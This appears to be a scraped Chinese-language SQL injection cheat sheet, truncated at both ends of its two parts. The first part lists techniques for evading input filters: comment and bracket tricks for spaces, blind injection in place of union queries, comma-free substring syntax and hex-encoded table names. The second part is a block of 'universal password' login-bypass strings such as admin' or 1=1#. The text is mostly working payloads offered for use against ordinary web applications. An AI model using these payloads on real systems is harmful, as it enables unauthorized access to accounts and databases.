过滤解决方案过滤空格, 可以使用括号() 或者注释 绕过过滤and, 可以使用or替代过滤union, 可以用盲注替代联合注入过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替盲注时，表名库名等名称请用16进制转换，前加 0x 后再进...

常见万能密码："or "a"="a'.).or.('.a.'='.aor 1=1--'or 1=1--a'or' 1=1--"or 1=1--'or.'a.'='a"or"="a'='a'or''=''or'='or'admin'or 1=1#'='&password='='admin' or 1=1#admin'//or//1=1#admin'/**...